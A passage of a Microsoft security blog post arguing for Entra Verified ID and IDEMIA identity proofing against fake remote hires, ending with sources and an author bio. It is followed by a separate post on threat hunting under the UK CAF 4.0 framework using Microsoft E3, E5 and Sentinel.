the tech industry at all (4). Financial services, healthcare, media, energy – any business that hires remote freelancers or IT staff could be at risk. Many Fortune 500 firms have quietly admitted to Charles Carmakal (Chief Technology Officer at Google Cloud’s Mandiant) that they’ve encountered fake candidates (2.3). Brandon Wales — former Executive Director of the Cybersecurity and Infrastructure Security Agency (CISA) and now VP of Cybersecurity Strategy at SentinelOne — warned that the “scale and speed” of these operations is unlike anything seen before (2.3). Rivka Little, Chief Growth Officer at Socure, put it bluntly: “Every Fortune 100 and potentially Fortune 500 has a pretty high number of risky employees on their books” right now (1). If you’re in charge of security or IT, this should send a chill down your spine. How do you defend against an attack that walks in through your front door (virtually) with HR’s approval? It calls for rethinking some fundamental practices, which leads us to the biggest gap these scams have exposed: identity verification in the hiring process. The Identity Verification Gap in Hiring Let’s face it: traditional hiring and onboarding operate on a lot of trust. You collect a résumé, maybe call some references, do a background check that might catch a criminal record but won’t catch a well-crafted fake identity. You might ask for a copy of a driver’s license or passport to satisfy HR paperwork, but how thoroughly is it checked? And once the person is hired and given an employee account, how often do we re-confirm that person’s identity in the months or years that follow? Almost never. Now let’s look at the situation from the reverse perspective: During your last recruitment, or when you became a new vendor for a client, were you asked to send over a full copy of your ID via email? Most likely, yes. You send a scan of your passport or ID card to an HR representative or a partner’s portal, and you have no idea where that image gets stored, who can see it, or how long it will sit around. It feels uncomfortable, but we do it because we need to prove who we are. In reality, we’re making a leap of faith that the process is secure. This is the identity verification gap. Companies are trusting documents and self-assertions that can be forged, and they rarely have a way to verify those beyond a cursory glance. Fraudsters exploit this gap mercilessly. They provide fake documents that look real, or steal someone else’s identity details to pass background checks. Once they’ve cleared that initial hurdle, the organization treats them as legit. IT sets up accounts, security gives them access, and from then on the “user identity” is assumed to be genuine. Forever. Moreover, once an employee is on board, internal processes often default to trust. Need a password reset? The helpdesk might ask for your birthdate or employee ID – pieces of info a savvy attacker can learn or steal. We don’t usually ask an employee who calls IT to re-prove that they are the same person HR hired months or years ago. All of this stands in contrast to the principle of Zero Trust security that many companies are now adopting. Thanks to John Kindervag (Forrester, 2009), Zero Trust says “never trust, always verify” each access request. But how can you verify if the underlying identity was fake to start with? As part of Microsoft, we often say that “identity is the new perimeter” – meaning the primary defense line is verifying identities, not just securing network walls. If that identity perimeter is built on shaky ground (unverified people), the whole security model is weak. So, what can be done? Security leaders and even the World Economic Forum are advocating for stronger identity proofing in hiring. The WEF specifically recommends “verifiable government ID checks at multiple stages of recruitment and into employment” (4). In other words, don’t just verify once and forget it – verify early, verify often. That might mean an ID and background check when offering the job, another verification during onboarding, and perhaps periodic re-checks or at least on certain events (like when the employee requests elevated privileges). Amazon’s CSO, S. Schmidt, echoed this after battling North Korean fakes; he advised companies to “Implement identity verification at multiple hiring stages and monitor for anomalous technical behavior” as a key defense (1). Of course, doing this manually is tough. You can’t very well ask each candidate to fly in their first day just to show their passport in person, especially with global and remote workforces. That’s where technology is stepping up. Enter the world of Verified ID and decentralized identity. Enter Microsoft Entra Verified ID: proving Identity, not just Checking a Box Imagine if, instead of emailing copies of your passport to every new employer or partner, you could carry a digital identity credential that is already verified and can be trusted by others instantly. That’s the idea behind Microsoft Entra Verified ID. It’s essentially a system for issuing and verifying cryptographically-secure digital identity credentials. Let’s break down what that means in plain terms. At its core, a Verified ID credential is like a digital ID card that lives in an app on your phone. But unlike a photocopy of your driver’s license (which anyone could copy, steal or tamper with), this digital credential is signed with cryptographic keys that make it tamper-proof and verifiable. It’s based on open standards. Microsoft has been heavily involved in the development of Decentralized Identifiers (DID) and W3C Verifiable Credentials standards over the past few years (7). The benefit of standards is that this isn’t a proprietary Microsoft-only thing – it’s part of a broader move toward decentralized identity, where the user is in control of their own credentials. Here’s a real-life analogy: When you go to a bar and need to prove you’re over 18, you show your driver’s license, National ID or Passport. The bouncer checks your birth date and maybe the hologram, but they don’t photocopy your entire ID and keep it; they just verify it and hand it back. You remain in possession of your ID. Now translate that to digital interactions: with Verified ID, you could have a credential on your phone that says “Government ID verified: [Your Name], age 25”. When a verifier (like an employer or service) needs proof, you share that credential through a secure app. The verifier’s system checks the credential’s digital signature to confirm it was issued by a trusted authority (for example, a background check company or a government agency) and that it hasn’t been altered. You don’t have to send over a scan of your actual passport or reveal extra info like your full birthdate or address – the credential can be designed to reveal only the necessary facts (e.g. “is over 18” = yes). This concept is called selective disclosure, and it’s a big win for privacy. Crucially, you decide which credentials to share and with whom. You might have one that proves your legal name and age (from a government issuer), another that proves your employment status (from your employer), another that proves a certification or degree (from a university). And you only share them when needed. They can also have expiration dates or be revoked. For instance, an employment credential could automatically expire when you leave the company. This means if someone tries to use an old credential, it would fail verification – another useful security feature. Now, how do these credentials get issued in the first place? This is where the integration of our Microsoft Partner IDEMIA comes in, which was a highlight of Microsoft Ignite 2025. IDEMIA is a company you might not have heard of, but they’re a huge player in the identity world – they’re the folks behind many government ID and biometric systems (think passport chips, national ID programs, biometric border control, etc.). Microsoft announced that Entra Verified ID now integrate IDEMIA’s identity verification services. In practice, this means when you need a high-assurance credential (like proving your real identity for a job), the system can invoke IDEMIA to do a thorough check. For example, as part of a remote onboarding process, an employer using Verified ID could ask the new hire to verify their identity through IDEMIA. The new hire gets a link or prompt, and is guided to scan their official government ID and take a live selfie video. IDEMIA’s system checks that the ID is authentic (not a forgery) and matches the person’s face, doing so in a privacy-protecting way (for instance, biometric data might be used momentarily to match and then not stored long-term, depending on the service policies). This process confirms “Yes, this is Alice, and we’ve confirmed her identity with a passport and live face check.” At that point, Microsoft Entra Verified ID can issue a credential to Alice, such as “Alice – identity verified by Contoso Corp on [Date]”. Alice stores this credential in her digital wallet (for instance, the Microsoft Authenticator app). Now Alice can present that credential to apps or IT systems to prove it’s really Alice. The employer might require it to activate her accounts, or later if Alice calls IT support, they might ask her to present the credential to prove her identity for a password reset. The verification of the credential is cryptographically secure and instantaneous – the IT system just checks the digital signature. There’s no need to manually pull up Alice’s passport scan from HR files or interrogate her with personal questions. Plus, Alice isn’t repeatedly sending sensitive personal documents; she shared them once with a trusted verifier (IDEMIA via the Verified ID app flow), not with every individual who asks for ID. This reduces the exposure of her personal data. From the company’s perspective, this approach dramatically improves security and streamlines processes. During onboarding, it’s actually faster to have someone go through an automated ID verification flow than to coordinate an in-person verification or trust slow manual checks. Organizations also avoid collecting and storing piles of personal documents, which is a compliance headache and a breach risk. Instead, they get a cryptographic assurance. Think of it like the difference between keeping copies of everyone’s credit card versus using a payment token – the latter is safer and just as effective for the transaction. Microsoft has been laying the groundwork for this for years. Back in 2020 (and even 2017....), Microsoft discussed decentralized identity concepts where users own their identity data and apps verify facts about you through digital attestations (7). Now it’s reality: Entra Verified ID uses those open standards (DID and Verifiable Credentials) under the hood. Plus, the integration with IDEMIA and others means it’s not just theoretical — it’s operational and scalable. As Ankur Patel, one of our product leaders for Microsoft Entra, said about these integrations: it enables “high assurance verification without custom business contracts or technical implementations” (6). In other words, companies can now easily plug this capability in, rather than building their own verification processes from scratch. Before moving on, let’s not forget to include the promised quote from IDEMIA’s exec that really underscores the value: “With more than 40 years of experience in identity issuance, verification and advanced biometrics, our collaboration with Microsoft enables secure authentication with verified identities organizations can rely on to ensure individuals are who they claim to be and critical services can be accessed seamlessly and securely.” – Amit Sharma, Head of Digital Strategy, IDEMIA (6) That quote basically says it all: verified identities that organizations can rely on, enabling seamless and secure access. Now, let’s see how that translates into real-world usage. Use Cases and Benefits: From Onboarding to Recovery How can Verified ID (plus IDEMIA’s) be applied in day-to-day business? There are several high-impact use cases: Remote Employee Onboarding (aka Hire with Confidence): This is the most straightforward scenario. When bringing in a new hire you haven’t met in person, you can integrate an identity verification step. As described earlier, the new employee verifies their government ID and face once, gets a credential, and uses that to start their work. The hiring team can trust that “this person is real and is who they say they are.” This directly prevents many fake-employee scams. In fact, some companies have already tried informal versions of this: The Register reported a story of an identity verification company (ironically) who, after seeing suspicious candidates, told one applicant “next interview we’ll do a document verification, it’s easy, we’ll send you a barcode to scan your ID” – and that candidate never showed up for the next round because they knew they’d be caught (1). With Verified ID, this becomes a standard, automated part of the process, not an ad-hoc test. As a bonus, the employee’s Verified ID credential can also speed up IT onboarding (auto-provisioning accounts when the verified credential is presented) and even simplify things like proving work authorization to other services (think how you often have to send copies of IDs to benefits providers or background screeners – a credential could replace that). The new hire starts faster, and with less anxiety because they know there’s a strong proof attached to their identity, and the company has less risk from day one. Oh, and HR isn’t stuck babysitting sensitive documents – governance and privacy risk go down. Stronger Helpdesk and Support Authentication: Helpdesk fraud is a common way attackers exploit weak verification. Instead of asking employees for their first pet’s name or a short code (which an attacker might phish), support can use Verified ID to confirm the person’s identity. For example, if someone calls IT saying “I’m locked out of my account,” the support portal can send a push notification asking the user to present their Verified Employee credential or do a quick re-verify via the app. If the person on the phone is an impostor, they’ll fail this check. If it’s the real employee, it’s an easy tap on their phone to prove it’s them. This approach secures processes like password resets, unlocking accounts, or granting temporary access. Think of it as caller-ID on steroids. Instead of taking someone’s word that “I am Alice from Finance,” the system actually asks for proof. And because the proof is cryptographically verified, it’s much harder to trick than a human support agent with a sob story. This reduces the burden on support too – less time playing detective with personal questions, more confidence in automating certain requests. Account Recovery and On-Demand Re-Verification: We’ve all dealt with the hassle of account recovery when we lose a password or device. Often it’s a weak link: backup codes, personal Q&A, the support team asking some manager who can’t even tell if it’s really you, or asking for a copy of your ID… With Verified ID, organizations can offer a secure self-service recovery that doesn’t rely on shared secrets. For instance, if you lose access to your multi-factor auth and need to regain entry, you could be prompted to verify your identity with a government ID check through the Verified ID system. Once you pass, you might be allowed to reset your authentication methods. Microsoft is already moving in this direction – there’s talk of replacing security questions with Verified ID checks for Entra ID account recovery (6). The benefit here is you get high assurance that the person recovering the account is the legitimate owner. This is especially important for administrators or other highly privileged users. And it’s still faster for the user than, say, waiting days for IT to manual vet and approve a request. Additionally, companies could have policies where every X months, employees might get a prompt to reaffirm their identity if they’re engaging in sensitive work. It keeps everyone honest and catches any anomalies (like, imagine an attacker somehow compromised an account – when faced with an unexpected ID check, they wouldn’t be able to comply, raising a red flag). Step-Up Authentication for Sensitive Actions: Not every action an employee takes needs this level of verification, but some absolutely do. For example, a finance officer making a $10 million wire transfer, or an engineer pushing code to a production environment, or an HR admin downloading an entire employee database – these could all trigger a step-up authentication that includes verifying the user’s identity credential. In practice, the user might get a pop-up saying “Please present your Verified ID to continue.” It might even ask for a quick fresh selfie depending on the sensitivity, which can be matched against the one on file (using Face Match in a privacy-conscious way). This is like saying: “We know you logged in with your password and MFA earlier, but this action is so critical that we want to double-check you are still the one executing it – not someone who stole your session or is using your computer.” It’s analogous to how some banks send a one-time code for high-value transactions, but instead of just a code (which could be stolen), it’s verifying you. This dramatically reduces the risk of insider threats and account takeovers causing catastrophic damage. And for the user, it’s usually a simple extra step that they’ll understand the importance of, especially in high-stakes fields. It builds trust – both that the company trusts them enough to give access, but also verifies them to ensure no one is impersonating them. In all these cases, Verified ID is adding security without a huge usability cost. In fact, many users might prefer it to the status quo: I’d rather verify my identity once properly than have to answer a bunch of security questions or have an IT person eyeballing my ID over a grainy video call. It also introduces transparency and control. As an employee, if I’m using a Verified ID, I know exactly what credential I’m sharing and why, and I have a log of it. It’s not an opaque process where I send documents into a void. From a governance perspective, using Verified ID means less widespread personal data to protect, and a clearer audit trail of “this action was taken by Alice, whose identity was verified by method X at time Y.” It can even help with regulatory compliance – for instance, proving that you really know who has access to sensitive financial data (important for things like SOX compliance or other audits). And circling back to the theme of fake employees, if such a system is in place, it’s a massive deterrent. The barrier to entry for fraudsters becomes much higher. It’s not impossible (nothing is, and you still need to Assume breach), but now they’d have to fool a top-tier document verification and biometric check – not just an overworked recruiter. That likely requires physical presence and high-quality fake documents, which are riskier and more costly for attackers. The more companies adopt such measures, the less “return on investment” these hiring scams will have for cybercriminals. The Bigger Picture: Verified Identity as the New Security Frontier The convergence of trends here is interesting. On one hand, we have digital transformation and remote work which opened the door to these novel attacks. On the other hand, we have new security philosophies like Zero Trust that emphasize continuous verification of identity and context. Verified ID is essentially Zero Trust for the hiring and identity side of things: “never trust an identity claim, always verify it.” What’s exciting is that this can now be done without turning the enterprise into a surveillance state or creating unbearable friction for legitimate users. It leverages cryptography and user-centric design to raise security and preserve privacy. Microsoft’s involvement in decentralized identity and the integration of partners like IDEMIA signals that this approach is maturing. It’s moving from pilot projects to being built into mainstream products (Entra ID, Microsoft 365, LinkedIn even offers verification badges via Entra Verified ID now (5)). It’s worth noting LinkedIn’s angle here: job seekers can verify where they work or their government ID on their LinkedIn profile, which could also help employers spot fakes (though it’s voluntary and early-stage). For CISOs and identity architects, Verified ID offers a concrete tool to address what was previously a very squishy problem. Instead of just crossing your fingers that employees are who they say they are, you can enforce it. It’s analogous to the evolution of payments security: we moved from signatures (which were rarely checked) to PIN codes and chips, and now to contactless cryptographic payments. Hiring and access management can undergo a similar upgrade from assumption-based to verification-based. Of course, adopting Verified ID or any new identity tech requires planning. Organizations will need to update their onboarding processes, train HR and IT staff on the new procedure, and ensure employees are comfortable with it. Privacy considerations must be addressed (e.g., clarify that biometric data used for verification isn’t stored indefinitely, etc.). But compared to the alternative – doing nothing and hoping to avoid being the next company in a scathing news headline about North Korean fake workers – the effort is worthwhile. In summary, human identity has become the new primary perimeter for cybersecurity. We can build all the firewalls and endpoint protections we want, but if a malicious actor can legitimately log in through the front door as an employee, those defenses may not matter. Verified identity solutions like Microsoft Entra Verified ID (with partners like IDEMIA) provide a way to fortify that perimeter with strong, real-time checks. They bring trust back into remote interactions by shifting from “trust by default” to “trust because verified.” This is not just a theoretical future; it’s happening now. As of late 2025, these tools are generally available and being rolled out in enterprises. Early adopters will likely be those in highly targeted sectors or with regulatory pressures – think defense contractors, financial institutions, and tech companies burned by experience. But I suspect it will trickle into standard best practices over the next few years, much like multi-factor authentication did. The fight against fake employees and deepfake hiring scams will continue, and attackers will evolve new tricks (perhaps trying to fake the verifications themselves). But having this layer in place tilts the balance back in favor of the defenders. It forces attackers to take more risks and expend more resources, which in turn dissuades many from even trying. To end on a practical note: If you’re a security decision-maker, now is a good time to evaluate your organization’s hiring and identity verification practices. Conduct a risk assessment – do you have any way to truly verify a new remote hire’s identity? How confident are you that all your current employees are real? If those questions make you uncomfortable, it’s worth looking into solutions like Verified ID. We’re entering an era where digital identity proofing will be as standard as background checks in HR processes. The technology has caught up to the threat, and embracing it could save your company from a very costly “lesson learned.” Remember: trust is good, but verified trust is better. By making identity verification a seamless part of the employee lifecycle, we can help ensure that the only people on the payroll are the ones we intended to hire. In a world of sophisticated fakes, that confidence is priceless. Sources: (1.1) The Register – Amazon blocked 1,800 suspected North Korean scammers seeking jobs (Dec 18, 2025) – S. Schmidt comments on DPRK fake workers and advises multi-stage identity verification. https://www.theregister.com/2025/12/18/amazon_blocked_fake_dprk_workers ("We believe, at this point, every Fortune 100 and potentially Fortune 500 has a pretty high number of risky employees on their books" Socure Chief Growth Officer Rivka Little) & https://www.linkedin.com/posts/stephenschmidt1_over-the-past-few-years-north-korean-dprk-activity-7407485036142276610-dot7 (“Implement identity verification at multiple hiring stages and monitor for anomalous technical behavior”, Amazon’s CSO, S. Schmidt) | (1.2) Heal Security – Amazon Catches North Korean IT Worker by Tracking Tiny 110ms Keystroke Delays (Dec 19, 2025). https://healsecurity.com/amazon-catches-north-korean-it-worker-by-tracking-tiny-110ms-keystroke-delays/ (2.1) U.S. Department of Justice – “Charges and Seizures Brought in Fraud Scheme Aimed at Denying Revenue for Workers Associated with North Korea” (May 16, 2024). https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north | (2.2) PCMag – “Remote Scammers Infiltrate 300+ Companies” (Aug 4, 2025). https://www.pcmag.com/news/is-your-coworker-a-north-korean-remote-scammers-infiltrate-300-plus-companies | (2.3) POLITICO – Tech companies have a big remote worker problem: North Korean operatives (May 12 2025). https://www.politico.com/news/2025/05/12/north-korea-remote-workers-us-tech-companies-00340208 ("I’ve talked to a lot of CISOs at Fortune 500 companies, and nearly every one that I’ve spoken to about the North Korean IT worker problem has admitted they’ve hired at least one North Korean IT worker, if not a dozen or a few dozen,” Charles Carmakal, Chief Technology Officer at Google Cloud’s Mandiant) & North Koreans posing as remote IT workers infiltrated 136 U.S. companies (Nov 14, 2025). https://www.politico.com/news/2025/11/14/north-korean-remote-work-it-scam-00652866 HR Dive – By 2028, 1 in 4 candidate profiles will be fake, Gartner predicts (Aug 8, 2025) – Gartner research highlighting rising candidate fraud and 25% fake profile forecast. https://www.hrdive.com/news/fake-job-candidates-ai/757126/ World Economic Forum – Unmasking the AI-powered, remote IT worker scams threatening businesses (Dec 15, 2025) – Overview of deepfake hiring threats; recommends government ID checks at multiple hiring stages. https://www.weforum.org/stories/2025/12/unmasking-ai-powered-remote-it-worker-scams-threatening-businesses-worldwide/ The Verge – LinkedIn gets a free verified badge that lets you prove where you work (Apr 2023) – Describes LinkedIn’s integration with Microsoft Entra for profile verification. https://www.theverge.com/2023/4/12/23679998/linkedin-verification-badge-system-clear-microsoft-entra Microsoft Tech Community – Building defense in depth: Simplifying identity security with new partner integrations (Nov 24, 2025 by P. Nrisimha) – Microsoft Entra blog announcing Verified ID GA, includes IDEMIA integration and quotes (Amit Sharma, Ankur Patel). https://techcommunity.microsoft.com/t5/microsoft-entra-blog/building-defense-in-depth-simplifying-identity-security-with-new/ba-p/4468733 & https://www.linkedin.com/posts/idemia-public-security_synced-passkeys-and-high-assurance-account-activity-7407061181879709696-SMi7 & https://www.linkedin.com/posts/4ankurpatel_synced-passkeys-and-high-assurance-account-activity-7406757097578799105-uFZz ("high assurance verification without custom business contracts or technical implementations", Ankur Patel) Microsoft Entra Blog – Building trust into digital experiences with decentralized identities (June 10, 2020 by A. Simons & A. Patel) – Background on Microsoft’s approach to decentralized identity (DID, Verifiable Credentials). https://techcommunity.microsoft.com/t5/microsoft-entra-blog/building-trust-into-digital-experiences-with-decentralized/ba-p/1257362 & Decentralized digital identities and blockchain: The future as we see it. https://www.microsoft.com/en-us/microsoft-365/blog/2018/02/12/decentralized-digital-identities-and-blockchain-the-future-as-we-see-it/ & Partnering for a path to digital identity (Janv 22, 2018) https://blogs.microsoft.com/blog/2018/01/22/partnering-for-a-path-to-digital-identity/ About the Author I'm Samuel Gaston-Raoul, Partner Solution Architect at Microsoft, working across the EMEA region with the diverse ecosystem of Microsoft partners—including System Integrators (SIs) and strategic advisory firms, Independent Software Vendors (ISVs) / Software Development Companies (SDCs), and Startups. I engage with our partners to build, scale, and innovate securely on Microsoft Cloud and Microsoft Security platforms. With a strong focus on cloud and cybersecurity, I help shape strategic offerings and guide the development of security practices—ensuring alignment with market needs, emerging challenges, and Microsoft’s product roadmap. I also engage closely with our product and engineering teams to foster early technical dialogue and drive innovation through collaborative design. Whether through architecture workshops, technical enablement, or public speaking engagements, I aim to evangelize Microsoft’s security vision while co-creating solutions that meet the evolving demands of the AI and cybersecurity era.Security Guidance Series: CAF 4.0 Threat Hunting From Detection to Anticipation
The CAF 4.0 update reframes C2 (Threat Hunting) as a cornerstone of proactive cyber resilience. According to the NCSC CAF 4.0, this principle is no longer about occasional investigations or manual log reviews; it now demands structured, frequent, and intelligence-led threat hunting that evolves in line with organizational risk. The expectation is that UK public sector organizations will not just respond to alerts but will actively search for hidden or emerging threats that evade standard detection technologies, documenting their findings and using them to strengthen controls and response. In practice, this represents a shift from detection to anticipation. Threat hunting under CAF 4.0 should be hypothesis-driven, focusing on attacker tactics, techniques, and procedures (TTPs) rather than isolated indicators of compromise (IoCs). Organizations must build confidence that their hunting processes are repeatable, measurable, and continuously improving, leveraging automation and threat intelligence to expand coverage and consistency. Microsoft E3 Microsoft E3 equips organizations with the baseline capabilities to begin threat investigation, forming the starting point for Partially Achieved maturity under CAF 4.0 C2. At this level, hunting is ad hoc and event-driven, but it establishes the foundation for structured processes. How E3 contributes to the following objectives in C2: Reactive detection for initial hunts: Defender for Endpoint Plan 1 surfaces alerts on phishing, malware, and suspicious endpoint activity. Analysts can use these alerts to triage incidents and document steps taken, creating the first iteration of a hunting methodology. Identity correlation and manual investigation: Entra ID P1 provides Conditional Access and MFA enforcement, while audit telemetry in the Security & Compliance Centre supports manual reviews of identity anomalies. These capabilities allow organizations to link endpoint and identity signals during investigations. Learning from incidents: By recording findings from reactive hunts and feeding lessons into risk decisions, organizations begin to build repeatable processes, even if hunts are not yet hypothesis-driven or frequent enough to match risk. What’s missing for Achieved: Under E3, hunts remain reactive, lack documented hypotheses, and do not routinely convert findings into automated detections. Achieving full maturity typically requires regular, TTP-focused hunts, automation, and integration with advanced analytics, capabilities found in higher-tier solutions. Microsoft E5 Microsoft E5 elevates threat hunting from reactive investigation to a structured, intelligence-driven discipline, a defining feature of Achieved maturity under CAF 4.0, C2. Distinctive E5 capabilities for C2: Hypothesis-driven hunts at scale: Defender Advanced Hunting (KQL) enables analysts to test hypotheses across correlated telemetry from endpoints, identities, email, and SaaS applications. This supports hunts focused on adversary TTPs, not just atomic IoCs, as CAF requires. Turning hunts into detections: Custom hunting queries can be converted into alert rules, operationalizing findings into automated detection and reducing reliance on manual triage. Threat intelligence integration: Microsoft Threat Intelligence feeds real-time actor tradecraft and sector-specific campaigns into the hunting workflow, ensuring hunts anticipate emerging threats rather than react to incidents. Identity and lateral movement focus: Defender for Identity surfaces Kerberos abuse, credential replay, and lateral movement patterns, enabling hunts that span beyond endpoints and email. Documented and repeatable process: E5 supports recording hunt queries and outcomes via APIs and portals, creating evidence for audits and driving continuous improvement, a CAF expectation. By embedding hypothesis-driven hunts, automation, and intelligence into business-as-usual operations, E5 helps public sector organizations meet CAF C2’s requirement for regular, documented hunts that proactively reduce risk, and evolve with the threat landscape. Sentinel Microsoft Sentinel takes threat hunting beyond the Microsoft ecosystem, unifying telemetry from endpoints, firewalls, OT systems, and third-party SaaS into a single cloud-native SIEM and SOAR platform. This consolidation helps enable hunts that span the entire attack surface, a critical step toward achieving maturity under CAF 4.0 C2. Key capabilities for control C2: Attacker-centric analysis: MITRE ATT&CK-aligned analytics and KQL-based hunting allow teams to identify stealthy behaviours, simulate breach paths, and validate detection coverage. Threat intelligence integration: Sentinel enriches hunts with national and sector-specific intelligence (e.g. NCSC advisories), ensuring hunts target the most relevant TTPs. Automation and repeatability: SOAR playbooks convert post-hunt findings into automated workflows for containment, investigation, and documentation, meeting CAF’s requirement for structured, continuously improving hunts. Evidence-driven improvement: Recorded hunts and automated reporting create a feedback loop that strengthens posture and demonstrates compliance. By combining telemetry, intelligence, and automation, Sentinel helps organizations embed threat hunting as a routine, scalable process, turning insights into detections and ensuring hunts evolve with the threat landscape. The video below shows how E3, E5 and Sentinel power real C2 threat hunts. Bringing it all Together By progressing from E3’s reactive investigation to E5’s intelligence-led correlation and Sentinel’s automated hunting and orchestration, organizations can develop an end-to-end capability that not only detects but anticipates and helps prevent disruption to essential public services across the UK. This is the operational reality of Achieved under CAF 4.0 C2 (Threat Hunting) - a structured, data-driven, and intelligence-informed approach that transforms threat hunting from an isolated task into an ongoing discipline of proactive defence. To demonstrate what effective, CAF-aligned threat hunting looks like, the following one-slider and demo walk through how Microsoft’s security tools support structured, repeatable hunts that match organizational risk. These examples help translate C2’s expectations into practical, operational activity. CAF 4.0 challenges public-sector defenders to move beyond detection and embrace anticipation. How mature is your organization’s ability to uncover the threats that have not yet been seen? In this final post of the series, the message is clear - true cyber resilience moves beyond reactivity towards a predictive approach.